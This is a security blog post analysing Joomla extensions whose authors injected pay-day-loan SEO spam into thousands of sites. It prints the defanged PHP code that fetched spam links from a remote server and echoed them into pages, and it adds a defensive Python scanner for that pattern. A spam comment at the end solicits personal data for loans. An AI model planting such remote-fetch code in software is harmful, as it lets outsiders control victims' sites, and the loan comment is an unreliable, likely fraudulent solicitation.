When Good Plugins Go Bad – SEO Spam on Joomla Websites

April 10, 2013 | Daniel Cid

We recently published an article about an interesting case in which a very popular WordPress plugin (Social Media Widget), with more than 900,000 downloads, was sold, and the new owners decided to use its large install base to inject spam into every site running it.

If you read that post, you will see how they went about injecting those “pay day loan” spam links to paydaypam.co.uk. What is even scarier is that in a single day the number of backlinks to paydaypam.co.uk increased from 0 to almost 450k, according to ahrefs.com:

Loan Spam

This gives you an idea of how big a targeted SEO Spam attack can be.

Spam SEO Attacks on Joomla sites

Unfortunately, this story is not new. One of our readers pointed us to a very similar case that happened in the Joomla ecosystem just a few weeks earlier. In similar fashion, the campaign was able to infiltrate more than 20,000 sites. The developers involved were the authors of a number of popular Joomla extensions:

iNowWeb.com (author: Sharif Mamdouh):
– AddThis For Joomla!
– Share This for Joomla!
– iNowSlider (mod_iNowSlider)
– iNow Twitter Widget (mod_TwitterWidget)
– BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
– Quotes By keyWord! (mod_JoomlaQuotes)
– iNow Wikio (mod_JoomlaWikio)
– iNow Twitter (mod_TwitterForJoomla)
– QuickJump for Joomla! (mod_quickjump)

Autson.com (author: xing):
– VirtueMart Advanced Search
– Skitter Slideshow
– FaceBook Slider
– Twitter Friends & Followers
– Flying Tweets
– Autson Twitter Search
– Twitter Quote
– FaceBook Show

Plimun.com:
– Plimun Twitter Ticker
– Twitter Show
– Nivo Slider

These developers tried to leverage their user base to inject the same type of SEO spam (pay day loans) into any site running their extensions. In this case, the hidden backlinks were fetched at page-render time from a server under the developers' control (URL defanged as it appeared in the extension code):

```php
<?php
// $path is the affected site's own URL/path, sent to the remote server as a query parameter.
// Whatever that server returns (here, hidden spam backlinks) is echoed straight into the page.
$credit=file_get_contents("httx://www.inowweb. com/p.php?i=".$path);
echo $credit;
```

This allowed the extension developers to control what was displayed on any site using their software, and to change it at any time without shipping an update. The Joomla security team reacted quickly and banned these developers and their associated extensions.
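A defender's way to look for this "fetch remote content, echo it raw" pattern across an installed extension tree. This is an added example, not code from the post or from any of the projects named above; the sample sources, hostnames and file names are constructed for the demonstration.

```python
"""Heuristic check for extension code that fetches remote content and echoes
it straight into the page, the pattern shown in the post above."""
import re

# Constructed sample extension sources (placeholder hostnames, not from the post).
SAMPLES = {
    "mod_widget_a/helper.php": (
        '$credit=file_get_contents("http://remote.example.invalid/p.php?i=".$path);\n'
        "echo $credit;\n"
    ),
    "mod_widget_b/helper.php": (            # local file, escaped output: benign
        '$items = file_get_contents(__DIR__ . "/cache/items.json");\n'
        "echo htmlspecialchars($items);\n"
    ),
    "mod_widget_c/helper.php": (            # same idea via curl
        '$ch = curl_init("https://feed.example.invalid/ticker");\n'
        "$out = curl_exec($ch);\n"
        "print $out;\n"
    ),
}

REMOTE_URL = re.compile(r'''["']\s*(?:https?|httx)://''', re.I)   # httx = defanged form
FETCH_ASSIGN = re.compile(r'\$(?P<var>\w+)\s*=\s*(?:file_get_contents|curl_exec)\s*\(', re.I)
RAW_OUTPUT = re.compile(r'\b(?:echo|print)\s+\$(?P<var>\w+)\s*;', re.I)


def scan_source(path, source):
    """Return one finding per variable filled by a remote fetch and then
    echoed/printed unescaped later in the same file."""
    if not REMOTE_URL.search(source):
        return []                       # no remote URL literal: nothing to correlate
    fetched, findings = {}, []          # var name -> line where it was assigned
    for lineno, line in enumerate(source.splitlines(), 1):
        m = FETCH_ASSIGN.search(line)
        if m:
            fetched[m.group("var")] = lineno
        m = RAW_OUTPUT.search(line)
        if m and m.group("var") in fetched:
            findings.append({"path": path, "var": m.group("var"),
                             "fetched_at": fetched[m.group("var")], "echoed_at": lineno})
    return findings


def scan_all(sources):
    """Run scan_source over a {path: source} mapping, e.g. a walked extension tree."""
    return [f for path, src in sources.items() for f in scan_source(path, src)]
```

Run `scan_all` over the PHP files of a modules/ or plugins/ directory; a hit is a file to read by hand, not proof of spam, since legitimate feed widgets can match too.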

Restricting the usage of Extensions

We have been talking about this for a while, but it is important to repeat. Limit your usage of extensions (or plugins), along with all other third-party components, and only use ones from trusted sources. More importantly, only install them if you actually need the functionality. The fewer plugins you have configured in your environment, the lower the chance of being caught in a similar situation. The last thing you want is to become part of a spam botnet.

If you are unsure if your site is showing those spammy keywords, you can scan it for free here: http://sitecheck.sucuri.net

Categories: Joomla Security, Website Malware Infections, WordPress Security
Tags: Malware Updates, SEO Spam, WordPress Plugins and Themes

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Comments

  1. Viktor Nagornyy

    April 10, 2013

    Thanks Daniel, great post. Were you able to find out how they were able to inject spam links into the social media widget plugin? One of our sites (monitored by Sucuri) had it installed and we did not upgrade it in a while, yet yesterday Sucuri picked it up. Or was it the case of you learning about it and adding to your database? Thanks.

  2. akash malik

    April 10, 2013

    Great post Daniel. It would be awesome if you keep us regularly updated on such issues by 3rd party plugins for Joomla & WordPress, as we have lots of sites built using these 2 platforms. Akash | Facebook Apps | Apps Mav

  3. Bret Londo

    April 16, 2013

    I think it is a third party plugin. By the way, thanks for your great post Daniel. WordPress is pretty much set up for SEO.

  4. John P

    May 16, 2013

    I found your site by searching on the trash that gets inserted on victims’ websites, which I’ve seen a couple of times lately, and the explanation was interesting to read. The reason I saw this effect in a couple of places was that I typically run my browser with JavaScript turned off, and when that’s the case, a visitor to the affected sites does see the hidden material.

  5. hopy

    May 24, 2013

    I am very much thankful to this website for providing the nice technology, and the information is also very great. I am very much satisfied with this technology. You are very like this information and I am definitely sure about that.

  6. Zach Smith

    June 28, 2013

    Thanks for publishing another great article for us. This is best for any technology related blog.

  7. MelindaFeedingFashion

    October 22, 2013

    My site has been attacked, I’ve had 848k comments on the one blog post I have sitting there. I’m not even actively using the blog. I am such a beginner here and can’t afford to pay IT people… Trying to figure out how to disable comments from the posts and hoping that will fix the problem, my host has shut down my site for excessive usage… Hope I am on the right track, struggling to find the clear info I need? If you know where I can get a clear how to, that would be great (I find the joomla help site so overwhelming but guess that’s where to look… Thanks

  8. easy

    September 16, 2014

    Do you need a Loan?
    Are you looking for Finance?
    Are you looking for a Loan to enlarge your business?
    I think you have come to the right place.
    We offer Loans at low interest rate.
    Interested people should please contact us on
    For immediate response to your application, Kindly
    reply to this emails below only.
    (easyloanoffer1@gmail.com)

    Please, do provide us with the Following information if interested.
    1) Full Name:………
    2) Gender:………
    3) Loan Amount Needed:………
    4) Loan Duration:………
    5) Country:………
    6) Home Address:………
    7) Mobile Number:………
    8)Monthly Income:…………………
    9)Occupation:………………………
    )Which site did you hear about us…………………
    Thanks and Best Regards.
    (easyloanoffer1@gmail.com)

    www.(easyloanoffer1@gmail.com)
